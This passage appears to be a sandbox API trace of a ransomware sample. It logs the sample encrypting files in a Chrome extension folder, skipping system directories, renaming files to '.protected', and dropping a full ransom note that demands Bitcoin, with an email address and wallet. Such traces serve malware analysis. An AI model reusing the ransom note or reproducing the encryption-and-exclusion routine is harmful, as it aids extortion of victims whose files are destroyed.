Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0078.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0078.847] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.847] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.847] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0078.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0078.847] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.847] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.848] lstrlenA (lpString="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") returned 684 [0078.848] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0078.848] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.848] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.848] CloseHandle (hObject=0x164) returned 1 [0078.848] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0078.848] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0078.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\RESTORE_FILES.txt") returned 156 [0078.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.848] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.848] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0078.849] lstrlenA (lpString="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") returned 684 [0078.849] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0078.849] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.849] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0078.849] CloseHandle (hObject=0x160) returned 1 [0078.849] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0078.849] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0078.849] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 139 [0078.849] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0078.849] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0078.849] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*") returned 141 [0078.849] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 
0x47bbd0 [0078.850] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\.") returned 141 [0078.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\..") returned 142 [0078.850] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.850] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.850] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", 
lpString2="Program Files (x86)") returned -1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0078.850] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0078.850] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.850] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0078.850] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.850] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0078.850] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0078.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0078.851] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0078.851] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0078.851] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0078.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.851] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0078.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.852] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0078.852] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0078.852] CloseHandle (hObject=0x164) returned 1 [0078.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected") returned 170 [0078.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0078.852] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0078.852] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.852] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0078.852] lstrcmpW 
(lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0078.852] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0078.852] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0078.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0078.853] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, 
lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0078.854] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0078.854] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0078.855] CloseHandle (hObject=0x164) returned 1 [0078.855] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected") returned 172 [0078.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected")) returned 1 [0078.855] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0078.855] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0078.855] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0078.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.861] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.861] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0078.862] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.862] WriteFile (in: hFile=0x160, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0078.862] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.862] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0078.862] CloseHandle (hObject=0x160) returned 1 [0078.862] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0078.862] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0078.862] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 